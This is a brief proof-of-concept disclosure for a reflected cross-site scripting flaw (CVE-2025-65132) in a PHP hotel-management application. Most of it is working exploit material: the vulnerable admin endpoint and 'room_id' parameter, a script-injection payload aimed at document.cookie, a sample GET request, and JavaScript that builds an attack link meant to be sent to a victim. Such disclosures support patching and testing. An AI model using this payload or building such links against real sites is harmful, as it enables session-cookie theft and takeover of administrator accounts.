CVE-2025-65132: hotel-management-php XSS漏洞

// PoC demonstration for CVE-2025-65132 // The vulnerability allows injection of arbitrary JavaScript via the 'room_id' parameter // Step 1: Craft a malicious URL // Target: http://target.com/public/admin/edit_room.php?room_id= // Payload: "><script>alert(document.cookie)</script> // Example Request: // GET /public/admin/edit_room.php?room_id="><script>alert('CVE-2025-65132')</script> console.log("Simulating request to vulnerable endpoint:"); const payload = '"><script>alert(1)</script>'; const targetUrl = `http://target.com/public/admin/edit_room.php?room_id=${encodeURIComponent(payload)}`; // In a real scenario, the attacker sends this link to the victim. // When the victim clicks, the script executes in their browser context. console.log(`Attack Link: ${targetUrl}`);